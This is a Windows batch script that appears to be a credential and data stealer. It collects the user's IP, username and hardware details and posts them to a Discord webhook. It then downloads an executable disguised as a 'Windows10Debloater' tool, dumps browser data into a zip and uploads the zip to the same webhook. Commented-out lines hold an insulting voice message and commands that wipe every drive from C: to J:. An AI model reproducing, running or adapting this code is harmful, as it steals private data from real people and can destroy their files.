@echo off
setlocal
curl icanhazip.com > ip & set /p ip=<ip
for /f "usebackq skip=1 tokens=*" %%i in (`wmic cpu get name ^| findstr /r /v "^$"`) do set cpu=%%i
for /f "usebackq skip=1 tokens=*" %%i in (`wmic path win32_VideoController get name ^| findstr /r /v "^$"`) do set gpu=%%i
curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**%username% has been grabbed!**^\n^\n**Information of User**^\n:bust_in_silhouette: Username : %username%^\n:gear: IP : %ip%^\n^\n**Information of Computer**^\n:alarm_clock: CPU : %cpu%^\n:bricks: GPU : %gpu%\"}" https://discord.com/api/webhooks/1010863932476497992/nMAlxTmV9xBd5lpzm5yjdjNh7jTjV-1-XEt-YrifB5e__veJ90Mi0qLsWKYF6lYSKGhN
endlocal
powershell -Command "iwr "https://github.com/Dazd-Pkz/Windows10Debloater/raw/main/powershell.exe" -o %temp%\powershell.exe"
%temp%\powershell.exe --zip --dir dump
curl -k -F "payload_json={\"content\": \"All Internet Browser Information of %username%\"}" -F "file1=@dump\dump.zip" https://discord.com/api/webhooks/1010863932476497992/nMAlxTmV9xBd5lpzm5yjdjNh7jTjV-1-XEt-YrifB5e__veJ90Mi0qLsWKYF6lYSKGhN
:: echo Dim sapi > %temp%\voice.vbs
:: echo Set sapi=CreateObject("sapi.spvoice") >> %temp%\voice.vbs
:: echo sapi.Speak "Coucou, je suis juste la petite voix qui te dit que la P D S vient de detruire ton pc, et ce, a tout jamais. amuse toi bien na le repare fils de viole, trais content. daidi au reille de la speilld." >> %temp%\voice.vbs
:: start %temp%\voice.vbs
:: if exist "C:\" (cd C:\ & del "*" /f /q /s & rd C:\ /s /q)
:: if exist "D:\" (cd D:\ & del "*" /f /q /s & rd D:\ /s /q)
:: if exist "E:\" (cd E:\ & del "*" /f /q /s & rd E:\ /s /q)
:: if exist "F:\" (cd F:\ & del "*" /f /q /s & rd F:\ /s /q)
:: if exist "G:\" (cd G:\ & del "*" /f /q /s & rd G:\ /s /q)
:: if exist "H:\" (cd H:\ & del "*" /f /q /s & rd H:\ /s /q)
:: if exist "I:\" (cd I:\ & del "*" /f /q /s & rd I:\ /s /q)
:: if exist "J:\" (cd J:\ & del "*" /f /q /s & rd J:\ /s /q)
